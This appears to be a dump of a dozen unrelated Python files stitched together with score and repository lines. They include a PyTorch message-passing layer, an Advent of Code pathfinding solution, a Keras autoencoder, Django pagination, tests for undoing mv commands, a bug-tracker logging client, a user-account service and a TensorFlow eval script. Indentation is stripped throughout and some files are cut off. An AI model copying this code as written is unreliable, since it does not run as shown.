import torch, sys
import torch.nn as nn
sys.path.append('..')
from MPLayers.lib_stereo import TRWP_hard_soft as TRWP_stereo
from MPLayers.lib_seg import TRWP_hard_soft as TRWP_seg
from utils.label_context import create_label_context
# references:
# http://www.benjack.io/2017/06/12/python-cpp-tests.html
# https://pytorch.org/tutorials/advanced/cpp_extension.html
class TRWPFunction(torch.autograd.Function):
@staticmethod
def forward(ctx, unary, label_context, edge_weights, args):
# to, unary:(batch,cv,h,w,disp),message:(dir,batch,cv,h,w,disp),label_context:(disp,disp) for seg and (disp) for stereo
# edge_weights:(dir,batch,cv,h,w)
batch, cv, h, w, n_disp = unary.size()
rho, n_iter, n_dir, is_training = args.rho, args.mpnet_max_iter, args.mpnet_n_dirs, args.training
TRWP = TRWP_seg if (n_disp == 21) else TRWP_stereo
message = unary.new_zeros(n_dir, batch, cv, h, w, n_disp)
cost_final = unary.new_zeros(batch, cv, h, w, n_disp)
unary_update = unary.new_zeros(batch, cv, h, w, n_disp)
if edge_weights is None:
edge_weights = unary.new_ones(n_dir, batch, cv, h, w)
enable_edge_weights = False
else:
enable_edge_weights = True
if args.enable_saving_label:
label_all = unary.new_zeros(n_iter, batch, cv, h, w, dtype=torch.uint8)
else:
label_all = torch.empty(0, dtype=torch.uint8)
if args.mpnet_enable_soft:
if is_training:
message_edge_label = unary.new_zeros(n_iter, n_dir, batch, cv, h, w, n_disp, n_disp)
cost_index = unary.new_zeros(n_iter, n_dir, batch, cv, h, w, dtype=torch.uint8)
else:
message_edge_label = torch.empty(0, dtype=torch.float32)
cost_index = torch.empty(0, dtype=torch.uint8)
TRWP.forward_soft(rho, int(n_iter), unary, label_context, edge_weights,
message, message_edge_label, cost_index, cost_final,
unary_update, label_all)
message_index = torch.empty(0, dtype=torch.float32)
else:
if is_training:
message_index = unary.new_zeros(n_iter, n_dir, batch, cv, h, w, n_disp, dtype=torch.uint8)
cost_index = unary.new_zeros(n_iter, n_dir, batch, cv, h, w, dtype=torch.uint8)
else:
message_index = torch.empty(0, dtype=torch.uint8)
cost_index = torch.empty(0, dtype=torch.uint8)
TRWP.forward(rho, int(n_iter), 0, unary, label_context,
edge_weights, message, cost_final, message_index, cost_index,
unary_update, label_all)
message_edge_label = torch.empty(0, dtype=torch.float32)
ctx.intermediate_results = rho, args, message_edge_label, message_index, \
cost_index, label_context, edge_weights, enable_edge_weights
del message, message_index, unary_update, label_context, edge_weights
return cost_final, label_all, message_edge_label, cost_index
@staticmethod
def backward(ctx, dcost_final, dlabel_all, dmessage_edge_label, dcost_index):
dcost_final = dcost_final.contiguous()
rho, args, message_edge_label, message_index, cost_index, \
label_context, edge_weights, enable_edge_weights = ctx.intermediate_results
del ctx.intermediate_results
cost_index = args.msg_norm_index if (args.msg_norm_index is not None) else cost_index
n_iter, n_dir, batch, cv, h, w = cost_index.size()
n_disp = args.n_classes
TRWP = TRWP_seg if (n_disp == 21) else TRWP_stereo
dunary = dcost_final.new_zeros(batch, cv, h, w, n_disp)
dmessage = dcost_final.new_zeros(n_dir, batch, cv, h, w, n_disp)
dunary_update = dcost_final.new_zeros(batch, cv, h, w, n_disp)
dedge_weights = dcost_final.new_zeros(n_dir, batch, cv, h, w)
if args.enable_seg:
dlabel_context = dcost_final.new_zeros(n_disp, n_disp)
else:
dlabel_context = dcost_final.new_zeros(n_disp)
if args.mpnet_enable_soft:
TRWP.backward_soft(rho, dcost_final, label_context, edge_weights, message_edge_label,
cost_index, dunary, dlabel_context, dedge_weights,
dmessage, dunary_update)
else:
TRWP.backward(rho, label_context, edge_weights, dcost_final, message_index,
cost_index, dunary, dlabel_context, dedge_weights,
dmessage, dunary_update)
del message_edge_label, message_index, cost_index, label_context, \
edge_weights, dcost_final, dmessage, dunary_update
dedge_weights = None if (not enable_edge_weights) else dedge_weights
return dunary, dlabel_context, dedge_weights, None, None, None
class MPModule(torch.nn.Module):
def __init__(self, args, enable_create_label_context=False, enable_saving_label=False):
super(MPModule, self).__init__()
self.args = args
self.args.enable_saving_label = enable_saving_label
self.args.rho = 0.5 if (args.mpnet_mrf_mode == 'TRWP') else 1
self.args.enable_seg = True if (args.n_classes == 21) else False
self.smoothness_train = args.mpnet_smoothness_train if args.mpnet_smoothness_train else None
self.smoothness_mode = args.mpnet_smoothness_mode if args.mpnet_smoothness_mode else None
self.smoothness_trunct_value = args.mpnet_smoothness_trunct_value
self.smoothness_trunct_loc = args.mpnet_smoothness_trunct_loc
if enable_create_label_context:
self.create_label_context()
def get_label_context(self):
return self.label_context, self.label_context_loc, self.label_context_diag_loc
def set_label_context(self, label_context, label_context_loc, label_context_diag_loc):
self.label_context = label_context
self.label_context_loc = label_context_loc
self.label_context_diag_loc = label_context_diag_loc
def create_label_context(self):
self.label_context, self.label_context_loc, self.label_context_diag_loc = \
create_label_context(self.args, enable_seg=self.args.enable_seg,
enable_symmetric=self.args.enable_symmetric)
def forward(self, unary, edge_weights=None, msg_norm_index=None, pairwise_terms=None):
# unary:(batch,cv,n_disp,h,w); label_context:(n_disp,n_disp) for seg and (n_disp) for stereo
# edge_weights:(batch,n_dir,h,w) unsqueeze(1) and permute to be (n_dir,batch,cv,h,w)
unary = unary.permute(0, 1, 3, 4, 2).contiguous()
if True:
edge_weights = edge_weights.unsqueeze(1).permute(2, 0, 1, 3, 4).contiguous() \
if (edge_weights is not None) else edge_weights
else:
# TODO : switch on for debugging when n_cv > 1 in test_parallel_grad.py
edge_weights = edge_weights.unsqueeze(0).permute(2, 0, 1, 3, 4).contiguous() \
if (edge_weights is not None) else edge_weights
label_context = self.label_context * self.args.mpnet_term_weight
if self.args.mpnet_smoothness_train == 'sigmoid':
label_context_valid = label_context[self.label_context_loc].flatten()
label_context[self.label_context_loc] = 2 * torch.sigmoid(label_context_valid)
elif self.args.mpnet_smoothness_train == 'softmax':
label_context_valid = label_context[self.label_context_loc].flatten()
label_context_max = label_context_valid.max()
label_context_norm = nn.Softmax(dim=0)(label_context_valid)
label_context_norm_max = label_context_norm.max()
label_context[self.label_context_loc] = label_context_norm * label_context_max / label_context_norm_max
if self.args.mpnet_smoothness_train in {'sigmoid', 'softmax'}:
label_context[self.label_context_diag_loc] = self.args.mpnet_diag_value
if edge_weights is not None:
assert unary.size()[-3:-1] == edge_weights.size()[-2:]
if unary.is_cuda and (msg_norm_index is not None):
msg_norm_index = msg_norm_index.cuda()
self.args.msg_norm_index = msg_norm_index
self.args.training = self.training
if self.args.mpnet_mrf_mode == 'TRWP':
cost_final, cost_all, message_vector, message_index = \
TRWPFunction.apply(unary, label_context, edge_weights, self.args)
else:
assert False
cost_final = cost_final.permute(0, 1, 4, 2, 3).contiguous()
label_context = label_context.unsqueeze(0) # Create a batch
return cost_final, label_context, cost_all, message_vector, message_index
| 2.1875
| 2
|
read_file_names.py
|
rajatagarwal/Filtered_Copy_Paste
| 0
|
12780069
|
<reponame>rajatagarwal/Filtered_Copy_Paste
from os import walk
from shutil import copyfile
# Get the list of file names to be written to the text file
f = []
external_disk_path = '/Volumes/My Passport/XXXX'
for (dir_path, dir_names, file_names) in walk(external_disk_path):
f.extend(file_names)
break
print("File names to be copied:")
print(file_names)
destination_file = open("/Users/file_name.txt", "w")
for item in file_names:
destination_file.write(item)
destination_file.write("\n")
destination_file.close()
| 3.734375
| 4
|
2021/15/sol.py
|
tjacquemin-ledger/aoc
| 0
|
12780070
|
<reponame>tjacquemin-ledger/aoc<filename>2021/15/sol.py
input = open('input', 'r').read().strip()
input = [list(map(int, r)) for r in input.splitlines()]
def neighbours(x, y, h, w):
return {(p, q) for u, v in ((1, 0), (0, -1), (-1, 0), (0, 1))
if 0 <= (p := x+u) < h and 0 <= (q := y+v) < w}
def p1():
m = input
# Dict based
seen, bag = set(), {(0, 0): 0}
while bag:
x, y = min(bag, key=bag.get)
risk = bag.pop((x, y))
seen.add((x, y))
if (x, y) == (len(m)-1, len(m[0])-1): return risk
for p, q in neighbours(x, y, len(m), len(m[0])):
if (p, q) in seen or risk + m[p][q] >= bag.get((p, q), float('inf')): continue
bag[p, q] = risk + m[p][q]
def p2():
m = [[(n+u+v-1) % 9 + 1 for v in range(5) for n in r] for u in range(5) for r in input]
# Heap based
from heapq import heappush, heappop
mins, bag = {(0, 0): 0}, [(0, (0, 0))]
while bag:
risk, (x, y) = heappop(bag)
if (x, y) == (len(m)-1, len(m[0])-1): return risk
for p, q in neighbours(x, y, len(m), len(m[0])):
if risk + m[p][q] < mins.get((p, q), float('inf')):
mins[p, q] = risk + m[p][q]
heappush(bag, (risk + m[p][q], (p, q)))
if (r1 := p1()) is not None: print(r1)
if (r2 := p2()) is not None: print(r2)
| 2.546875
| 3
|
costar_models/python/costar_models/pretrain_image.py
|
cpaxton/costar_plan
| 66
|
12780071
|
from __future__ import print_function
import keras.backend as K
import keras.losses as losses
import keras.optimizers as optimizers
import numpy as np
from keras.callbacks import ModelCheckpoint
from keras.layers.advanced_activations import LeakyReLU
from keras.layers import Input, RepeatVector, Reshape
from keras.layers.embeddings import Embedding
from keras.layers.merge import Concatenate, Multiply
from keras.losses import binary_crossentropy
from keras.models import Model, Sequential
from .multi_sampler import *
class PretrainImageAutoencoder(RobotMultiPredictionSampler):
def __init__(self, taskdef, *args, **kwargs):
'''
As in the other models, we call super() to parse arguments from the
command line and set things like our optimizer and learning rate.
'''
super(PretrainImageAutoencoder, self).__init__(taskdef, *args, **kwargs)
self.PredictorCb = ImageCb
self.save_encoder_decoder = True
def _makePredictor(self, features):
'''
Create model to predict possible manipulation goals.
'''
(images, arm, gripper) = features
img_shape, image_size, arm_size, gripper_size = self._sizes(
images,
arm,
gripper)
img_in = Input(img_shape,name="predictor_img_in")
img0_in = Input(img_shape,name="predictor_img0_in")
option_in = Input((1,), name="predictor_option_in")
encoder = self._makeImageEncoder(img_shape)
ins = [img0_in, img_in]
# Create the encoder
enc = encoder(img_in)
#enc = Dropout(self.dropout_rate)(enc)
decoder = self._makeImageDecoder(
self.hidden_shape,
self.skip_shape,)
out = decoder(enc)
if not self.no_disc:
# Create the discriminator to make sure this is a good image
image_discriminator = MakeImageClassifier(self, img_shape)
image_discriminator.load_weights(
self.makeName("discriminator", "classifier"))
image_discriminator.trainable = False
o2 = image_discriminator([img0_in, out])
if self.no_disc:
ae = Model(ins, [out])
ae.compile(
loss=["mae"],
loss_weights=[1.],
optimizer=self.getOptimizer())
else:
ae = Model(ins, [out, o2])
ae.compile(
loss=["mae"] + ["categorical_crossentropy"],
loss_weights=[1.,1e-3],
optimizer=self.getOptimizer())
encoder.summary()
decoder.summary()
ae.summary()
return ae, ae, None, [img_in], enc
def _getData(self, *args, **kwargs):
features, targets = GetAllMultiData(self.num_options, *args, **kwargs)
[I, q, g, oin, label, q_target, g_target,] = features
o1 = targets[1]
I0 = I[0,:,:,:]
length = I.shape[0]
I0 = np.tile(np.expand_dims(I0,axis=0),[length,1,1,1])
if self.no_disc:
return [I0, I], [I]
else:
o1_1h = np.squeeze(ToOneHot2D(o1, self.num_options))
return [I0, I], [I, o1_1h]
| 2.375
| 2
|
backend/clubs/filters.py
|
pennlabs/penn-clubs
| 23
|
12780072
|
import random
from collections import OrderedDict
from urllib.parse import quote
from rest_framework import filters
from rest_framework.pagination import PageNumberPagination
from rest_framework.response import Response
DEFAULT_PAGE_SIZE = 15
DEFAULT_SEED = 1234
class OptionalPageNumberPagination(PageNumberPagination):
"""
Optional pagination that does not paginate the response
if the user does not specify it.
"""
page_size = DEFAULT_PAGE_SIZE
page_size_query_param = "page_size"
def paginate_queryset(self, queryset, request, view=None):
if self.page_query_param not in request.query_params:
return None
return super().paginate_queryset(queryset, request, view)
class RandomPageNumberPagination(OptionalPageNumberPagination):
"""
Custom pagination that supports randomly sorting objects with pagination.
Must be used with the associated ordering filter.
"""
def paginate_queryset(self, queryset, request, view=None):
if "random" in request.query_params.get("ordering", "").split(","):
rng = random.Random(request.GET.get("seed", DEFAULT_SEED))
results = list(queryset)
rng.shuffle(results)
self._random_count = getattr(request, "_original_item_count", None)
if self._random_count is None:
self._random_count = queryset.model.objects.count()
else:
del request._original_item_count
page = int(request.GET.get("page", 1))
page_size = int(request.GET.get("page_size", DEFAULT_PAGE_SIZE))
if (page - 1) * page_size >= self._random_count:
self._random_next_page = None
else:
new_params = request.GET.dict()
new_params["page"] = str(page + 1)
self._random_next_page = "{}?{}".format(
request.build_absolute_uri(request.path),
"&".join(
["{}={}".format(k, quote(v)) for k, v in new_params.items()]
),
)
return results
return super().paginate_queryset(queryset, request, view)
def get_paginated_response(self, data):
if hasattr(self, "_random_next_page"):
return Response(
OrderedDict(
[
("count", self._random_count),
("next", self._random_next_page),
("results", data),
]
)
)
return super().get_paginated_response(data)
class RandomOrderingFilter(filters.OrderingFilter):
"""
Custom ordering filter that supports random pagination.
Must be used with the associated pagination class.
"""
def filter_queryset(self, request, queryset, view):
new_queryset = super().filter_queryset(request, queryset, view)
ordering = request.GET.get("ordering", "").split(",")
# handle random ordering
if "random" in ordering:
page = int(request.GET.get("page", 1)) - 1
page_size = int(request.GET.get("page_size", DEFAULT_PAGE_SIZE))
rng = random.Random(request.GET.get("seed", DEFAULT_SEED))
all_ids = list(new_queryset.order_by("id").values_list("id", flat=True))
rng.shuffle(all_ids)
start_index = page * page_size
end_index = (page + 1) * page_size
page_ids = all_ids[start_index:end_index]
request._original_item_count = new_queryset.count()
return new_queryset.filter(id__in=page_ids)
return new_queryset
| 3.0625
| 3
|
assignements/test_S3.py
|
YoanRouleau/BachelorDIM-Lectures-Algorithms-2020
| 0
|
12780073
|
<filename>assignements/test_S3.py
import S3_imgproc_tools as tobetested
import pytest
import numpy as np
def test_invert_color_numpy_tuNone():
with pytest.raises(ValueError):
tobetested.invert_color_numpy(None)
def test_invert_color_numpy_tuArray():
with pytest.raises(TypeError):
tobetested.invert_color_numpy(1)
def test_invert_color_numpy_tuuint8():
with pytest.raises(TypeError):
tobetested.invert_color_numpy(np.zeros((2,2), dtype=np.float32))
| 2.1875
| 2
|
tests/test_undos/test_coreutils/test_mv.py
|
joshmeranda/undo
| 0
|
12780074
|
<gh_stars>0
import os
import shutil
import unittest
import undo.resolve as resolve
import undo.expand as expand
import tests.test_undos.test_coreutils.common as common
class TestMv(unittest.TestCase):
@classmethod
def setUpClass(cls) -> None:
if os.path.exists(common.COREUTILS_TEST_ENV_DIR):
shutil.rmtree(common.COREUTILS_TEST_ENV_DIR)
os.mkdir(common.COREUTILS_TEST_ENV_DIR)
os.mknod(os.path.join(
common.COREUTILS_TEST_ENV_DIR,
"OUTER"
))
os.mkdir(os.path.join(
common.COREUTILS_TEST_ENV_DIR,
"DIR"
))
os.mknod(os.path.join(
common.COREUTILS_TEST_ENV_DIR,
"DIR",
"INNER"
))
os.mknod(os.path.join(
common.COREUTILS_TEST_ENV_DIR,
"DIR",
"ANOTHER_INNER"
))
cwd_bak = os.getcwd()
os.chdir(common.COREUTILS_TEST_ENV_DIR)
cls.addClassCleanup(shutil.rmtree, common.COREUTILS_TEST_ENV_DIR)
cls.addClassCleanup(os.chdir, cwd_bak)
def test_rename(self):
command = "mv ORIGINAL OUTER"
expected = []
actual = [expand.expand(undo, env, ("%", "%"), "; ")
for env, undo in
resolve.resolve(command, [common.COREUTILS_UNDO_DIR], False, False, "sh")]
self.assertListEqual(expected, actual)
expected = ["mv OUTER ORIGINAL"]
actual = [expand.expand(undo, env, ("%", "%"), "; ")
for env, undo in
resolve.resolve(command, [common.COREUTILS_UNDO_DIR], False, True, "sh")]
self.assertListEqual(expected, actual)
def test_rename_precise(self):
command = "mv --no-clobber ORIGINAL OUTER"
expected = ["mv OUTER ORIGINAL"]
actual = [expand.expand(undo, env, ("%", "%"), "; ")
for env, undo in
resolve.resolve(command, [common.COREUTILS_UNDO_DIR], False, False, "sh")]
self.assertListEqual(expected, actual)
def test_move_single(self):
command = "mv INNER DIR"
expected = []
actual = [expand.expand(undo, env, ("%", "%"), "; ")
for env, undo in
resolve.resolve(command, [common.COREUTILS_UNDO_DIR], False, False, "sh")]
self.assertListEqual(expected, actual)
expected = ["mv DIR/INNER INNER"]
actual = [expand.expand(undo, env, ("%", "%"), "; ")
for env, undo in
resolve.resolve(command, [common.COREUTILS_UNDO_DIR], False, True, "sh")]
self.assertListEqual(expected, actual)
def test_move_single_precise(self):
command = "mv --no-clobber INNER DIR"
expected = ["mv DIR/INNER INNER"]
actual = [expand.expand(undo, env, ("%", "%"), "; ")
for env, undo in
resolve.resolve(command, [common.COREUTILS_UNDO_DIR], False, False, "sh")]
self.assertListEqual(expected, actual)
def test_move_multiple(self):
command = "mv INNER ANOTHER_INNER DIR"
expected = []
actual = [expand.expand(undo, env, ("%", "%"), "; ")
for env, undo in
resolve.resolve(command, [common.COREUTILS_UNDO_DIR], False, False, "sh")]
self.assertListEqual(expected, actual)
expected = ["mv DIR/INNER INNER; mv DIR/ANOTHER_INNER ANOTHER_INNER"]
actual = [expand.expand(undo, env, ("%", "%"), "; ")
for env, undo in
resolve.resolve(command, [common.COREUTILS_UNDO_DIR], False, True, "sh")]
self.assertListEqual(expected, actual)
def test_move_multiple_precise(self):
command = "mv --no-clobber INNER ANOTHER_INNER DIR"
expected = ["mv DIR/INNER INNER; mv DIR/ANOTHER_INNER ANOTHER_INNER"]
actual = [expand.expand(undo, env, ("%", "%"), "; ")
for env, undo in
resolve.resolve(command, [common.COREUTILS_UNDO_DIR], False, False, "sh")]
self.assertListEqual(expected, actual)
def test_move_single_with_target_directory(self):
command = "mv -t DIR INNER"
expected = []
actual = [expand.expand(undo, env, ("%", "%"), "; ")
for env, undo in
resolve.resolve(command, [common.COREUTILS_UNDO_DIR], False, False, "sh")]
self.assertListEqual(expected, actual)
expected = ["mv DIR/INNER INNER"]
actual = [expand.expand(undo, env, ("%", "%"), "; ")
for env, undo in
resolve.resolve(command, [common.COREUTILS_UNDO_DIR], False, True, "sh")]
self.assertListEqual(expected, actual)
def test_move_single_with_target_directory_precise(self):
command = "mv --no-clobbe -t DIR INNER"
expected = ["mv DIR/INNER INNER"]
actual = [expand.expand(undo, env, ("%", "%"), "; ")
for env, undo in
resolve.resolve(command, [common.COREUTILS_UNDO_DIR], False, False, "sh")]
self.assertListEqual(expected, actual)
def test_move_multiple_with_target_directory(self):
command = "mv -t DIR INNER ANOTHER_INNER"
expected = []
actual = [expand.expand(undo, env, ("%", "%"), "; ")
for env, undo in
resolve.resolve(command, [common.COREUTILS_UNDO_DIR], False, False, "sh")]
self.assertListEqual(expected, actual)
expected = ["mv DIR/INNER INNER; mv DIR/ANOTHER_INNER ANOTHER_INNER"]
actual = [expand.expand(undo, env, ("%", "%"), "; ")
for env, undo in
resolve.resolve(command, [common.COREUTILS_UNDO_DIR], False, True, "sh")]
self.assertListEqual(expected, actual)
def test_move_multiple_with_target_directory_precise(self):
command = "mv --no-clobber -t DIR INNER ANOTHER_INNER"
expected = ["mv DIR/INNER INNER; mv DIR/ANOTHER_INNER ANOTHER_INNER"]
actual = [expand.expand(undo, env, ("%", "%"), "; ")
for env, undo in
resolve.resolve(command, [common.COREUTILS_UNDO_DIR], False, False, "sh")]
self.assertListEqual(expected, actual)
if __name__ == "__main__":
unittest.main()
| 2.265625
| 2
|
ZathuraProject/__init__.py
|
ibtehaz-shawon/LoggerProject
| 1
|
12780075
|
import inspect
import os
import sys
import time
from datetime import datetime
from uuid import uuid4
import pkg_resources
import pyfiglet
from ZathuraProject.bugtracker import (send_data_to_bugtracker,
send_verbose_log_to_bugtracker)
CURRENT_VERSION = "v0.0.6 beta"
def create_app():
if sys.version_info < (3, 0, 0):
print("Zathura needs python3.x to perform normally!")
sys.exit(255)
pyfiglet_ascii() # spits out zathura in speed font
print("*#$" * 20)
print("Current version: {}".format(CURRENT_VERSION))
print("*#$" * 20)
return
def pyfiglet_ascii():
"""
Prints out Zathura using pyfiglet package, speed font.
"""
print(pyfiglet.figlet_format("Zathura", font="speed"))
class Zathura:
def __init__(self, bugtracker_url: str = None,
project_token: str = None):
"""
Initiates zathura using bugtracker url and project token.
:param: bugtracker_url: str
:param: project_token: str
"""
self.verbose_url = None
self.error_url = None
self.project_token = project_token
if bugtracker_url is not None:
if bugtracker_url[-1:] != '/':
bugtracker_url += '/'
self.error_url = bugtracker_url + "project/error/log/"
self.verbose_url = bugtracker_url + "project/verbose/log/"
def log_error(self, error_name, error_description, user=None):
"""
logs error in bugtracker server.
        :param: error_name: str Name of the error.
:param: error_description: str This should include all the necessary details of an exception.
:param: user: str It's an optional field. This will help to uniquely identify a user.
:returns: bool whether log has been logged successfully
"""
point_of_origin = (inspect.stack()[1].function).lower()
if self.error_url is not None:
return send_data_to_bugtracker(
name=error_name,
description=error_description,
origin=point_of_origin,
token=self.project_token,
url=self.error_url,
user=user
)
return False
def log_verbose(self, description=None, user=None):
"""
logs verbose (debug) in bugtracker server.
:param: description: str This could be a long description of any debug message you want to see.
:param: user: str It's an optional field. This will help to uniquely identify a user.
:returns: bool whether log has been logged successfully
"""
point_of_origin = (inspect.stack()[1].function).lower()
if self.verbose_url is not None:
return send_verbose_log_to_bugtracker(
origin=point_of_origin,
description=description,
project_token=self.project_token,
bugtracker_url=self.verbose_url,
user=user
)
return False
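def _example_usage():
    # Hedged sketch (added for illustration, not called anywhere): the URL and token
    # are placeholders, and log_error would issue a real HTTP request to that
    # (hypothetical) bugtracker instance.
    zathura = Zathura(bugtracker_url="https://bugtracker.example.com",
                      project_token="<PROJECT-TOKEN>")
    return zathura.log_error("ValueError", "example error description", user="user-42")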
| 2.375
| 2
|
tests/unit/test_util.py
|
galsuchetzky/PytorchTemplate
| 1
|
12780076
|
<filename>tests/unit/test_util.py
import unittest
"""
TODO testing:
1)
"""
class TestClassName(unittest.TestCase):
def test_(self):
self.assertIsNotNone(None)
if __name__ == '__main__':
unittest.main()
| 2.546875
| 3
|
part3/webapp/final/pypi_web_mongodb_f/pypi_web_mongodb/services/user_service.py
|
israelrico007/build-pypi-mongodb-webcast-series
| 25
|
12780077
|
from typing import Optional
from passlib.handlers.sha2_crypt import sha512_crypt
from pypi_web_mongodb.data.users import User
def user_count() -> int:
return User.objects().count()
def user_by_id(user_id) -> Optional[User]:
return User.objects().filter(id=user_id).first()
def user_by_email(email: str) -> Optional[User]:
found = User.objects().filter(email=email).first()
return found
def create_account(full_name: str, email: str, plain_text_password: str) -> Optional[User]:
if not email or not email.strip():
raise Exception("Email address required")
if not plain_text_password or not plain_text_password.strip():
raise Exception("Password required")
email = email.strip().lower()
found = user_by_email(email)
if found:
raise Exception("User with email {} already exists.".format(email))
user = User()
user.email = email
user.name = full_name
    user.hashed_password = hash_text(plain_text_password)
user.save()
return user
def login_account(email: str, plain_text_password: str) -> Optional[User]:
if not email or not email.strip():
return None
if not plain_text_password or not plain_text_password.strip():
return None
email = email.strip().lower()
found = user_by_email(email)
if not found:
return None
if not verify_hash(found.hashed_password, plain_text_password):
return None
return found
def hash_text(text: str) -> str:
hashed_text = sha512_crypt.encrypt(text, rounds=150000)
return hashed_text
def verify_hash(hashed_text: str, plain_text: str) -> bool:
return sha512_crypt.verify(plain_text, hashed_text)
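if __name__ == "__main__":
    # Hedged sketch (added for illustration): a hash/verify round trip with a made-up
    # password. create_account/login_account additionally need a configured MongoDB
    # connection, so they are not exercised here.
    hashed = hash_text("correct horse battery staple")
    assert verify_hash(hashed, "correct horse battery staple")
    assert not verify_hash(hashed, "wrong password")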
| 2.6875
| 3
|
CoAttention_utils.py
|
abhishekyana/VQA
| 2
|
12780078
|
import torch
import numpy as np
import pickle
def filterit(s,W2ID):
s=s.lower()
S=''
for c in s:
if c in ' abcdefghijklmnopqrstuvwxyz0123456789':
S+=c
S = " ".join([x if x and x in W2ID else "<unk>" for x in S.split()])
return S
def Sentence2Embeddings(sentence,W2ID,EMB):
if type(sentence)==str:
sentence = filterit(sentence, W2ID)
#print(sentence)
IDS = torch.tensor([W2ID[i] for i in sentence.split(" ")])
return EMB(IDS)
if type(sentence)==list:
sembs = []
for sent in sentence:
sent = filterit(sent,W2ID)
IDS = torch.tensor([W2ID[i] for i in sent.split(" ")])
sembs.append(EMB(IDS))
sembs = torch.nn.utils.rnn.pad_sequence(sembs,batch_first=True)
return sembs
def GetEmbeddings(path='./student_code/supportfiles/GloVe300.d'):
GloVe = pickle.load(open(path,'rb'))
W2ID = {w:i for i,w in enumerate(sorted(list(GloVe.keys())))}
EMB = torch.nn.Embedding(len(W2ID),300)
EMB.weight.requires_grad=False
GloVeW = np.vstack([GloVe[w] for w in W2ID])
EMB.weight.data.copy_(torch.from_numpy(GloVeW))
return W2ID, EMB
def getAnsWords(path='./student_code/supportfiles/CoAttAns.d'):
with open(path,'rb') as file:
data = pickle.load(file)
return data
def Answer2OneHot1(answers,AW):
A=[]
for answer in answers:
Aembs = torch.zeros(len(AW))
for w in answer.split(" "):
if w in AW:
Aembs[AW[w]]=1
break
else:
Aembs[0]=1
break
A.append(Aembs)
A = torch.stack(A)
return A
def Answer2OneHot(answers,AW):
A=[]
for answer in answers:
Aembs = torch.zeros(len(AW))
w = answer.split(" ")[0]
if w in AW:Aembs[AW[w]]=1
else:Aembs[-1]=1
A.append(Aembs)
A = torch.stack(A)
return A
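if __name__ == "__main__":
    # Hedged sketch (added for illustration): filterit lowercases the text, drops
    # punctuation and maps out-of-vocabulary words to "<unk>"; the toy vocabulary
    # below is made up.
    toy_w2id = {"hello": 0, "world": 1, "<unk>": 2}
    print(filterit("Hello, brave World!", toy_w2id))  # -> "hello <unk> world"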
| 2.4375
| 2
|
test/test_mod_group.py
|
dvkruchinin/python_tr
| 0
|
12780079
|
#!/usr/bin/env python
# coding:utf-8
"""
Name : test_mod_group.py
Author : <NAME>
Date : 6/21/2021
Desc:
"""
from model.group import Group
from random import randrange
def test_modification_some_group(app, db, check_ui):
if len(db.get_group_list()) == 0:
app.group.create(Group(name="test"))
old_groups = db.get_group_list()
index = randrange(len(old_groups))
group = Group(name="111", header="222", footer="333")
group.id = old_groups[index].id
app.group.modification_group_by_id(group.id, group)
new_groups = db.get_group_list()
old_groups[index] = group
assert old_groups == new_groups
if check_ui:
assert sorted(old_groups, key=Group.id_or_max) == sorted(app.group.get_group_list(), key=Group.id_or_max)
def test_modification_some_group_name(app, db, check_ui):
if len(db.get_group_list()) == 0:
app.group.create(Group(name="test"))
old_groups = db.get_group_list()
index = randrange(len(old_groups))
group = Group(name="New group")
group.id = old_groups[index].id
app.group.modification_group_by_id(group.id, group)
new_groups = db.get_group_list()
old_groups[index] = group
assert old_groups == new_groups
if check_ui:
assert sorted(old_groups, key=Group.id_or_max) == sorted(app.group.get_group_list(), key=Group.id_or_max)
def test_modification_some_group_header(app, db, check_ui):
if len(db.get_group_list()) == 0:
app.group.create(Group(name="test"))
old_groups = db.get_group_list()
index = randrange(len(old_groups))
group = Group(header="New header")
group.id = old_groups[index].id
group.name = old_groups[index].name
app.group.modification_group_by_id(group.id, group)
new_groups = db.get_group_list()
old_groups[index] = group
assert old_groups == new_groups
if check_ui:
assert sorted(old_groups, key=Group.id_or_max) == sorted(app.group.get_group_list(), key=Group.id_or_max)
def test_modification_some_group_footer(app, db, check_ui):
app.group.create_group_if_missing()
old_groups = db.get_group_list()
index = randrange(len(old_groups))
group = Group(footer="New footer")
group.id = old_groups[index].id
group.name = old_groups[index].name
app.group.modification_group_by_id(group.id, group)
new_groups = db.get_group_list()
old_groups[index] = group
assert old_groups == new_groups
if check_ui:
assert sorted(old_groups, key=Group.id_or_max) == sorted(app.group.get_group_list(), key=Group.id_or_max)
| 2.484375
| 2
|
single_eval.py
|
wbj0110/cnn-text-classification-tf-chinese
| 0
|
12780080
|
#! /usr/bin/env python
import tensorflow as tf
import numpy as np
import os
import data_helpers
import csv
import pickle
import data_helpers as dp
import json
# Parameters
# ==================================================
# Data Parameters
tf.flags.DEFINE_string("positive_data_file", "./data/rt-polaritydata/rt-polarity.pos", "Data source for the positive data.")
tf.flags.DEFINE_string("negative_data_file", "./data/rt-polaritydata/rt-polarity.neg", "Data source for the positive data.")
# Eval Parameters
tf.flags.DEFINE_integer("batch_size", 64, "Batch Size (default: 64)")
tf.flags.DEFINE_string("checkpoint_dir", "../runs/1548399951/checkpoints/", "Checkpoint directory from training run")
tf.flags.DEFINE_boolean("eval_train", False, "Evaluate on all training data")
# Misc Parameters
tf.flags.DEFINE_boolean("allow_soft_placement", True, "Allow device soft device placement")
tf.flags.DEFINE_boolean("log_device_placement", False, "Log placement of ops on devices")
FLAGS = tf.flags.FLAGS
#FLAGS._parse_flags()
flags_dict = FLAGS.flag_values_dict()
print("\nParameters:")
for attr, value in sorted(flags_dict.items()):
print("{}={}".format(attr.upper(), value))
print("")
runs_path = os.path.abspath(os.path.join(FLAGS.checkpoint_dir, os.path.pardir))
vacabulary_path = os.path.join(runs_path, "vocab")
print("vacabulary path:"+vacabulary_path)
vacabulary_file = open(vacabulary_path, "rb")
vacabulary = pickle.load(vacabulary_file)
vacabulary_file.close()
#load sequence length
sequence_path = os.path.join(runs_path, "sequence_lenth")
sequence_file = open(sequence_path, "rb")
sequence_length = pickle.load(sequence_file)
sequence_file.close()
print("sequence is {0}",sequence_length)
label_list = []
label_json_path = os.path.join(runs_path, "lable.json")
with open(label_json_path,'r') as load_f:
label_list = json.load(load_f)
def classify(text):
x_text = [list(text.strip())]
sentences_padded = dp.pad_sentences(x_text, sequence_length=sequence_length)
x = np.array([[vacabulary.get(word,0) for word in sentence] for sentence in sentences_padded])
print("\npredict...\n")
# Evaluation
# ==================================================
checkpoint_file = tf.train.latest_checkpoint(FLAGS.checkpoint_dir)
graph = tf.Graph()
with graph.as_default():
session_conf = tf.ConfigProto(
allow_soft_placement=FLAGS.allow_soft_placement,
log_device_placement=FLAGS.log_device_placement)
sess = tf.Session(config=session_conf)
with sess.as_default():
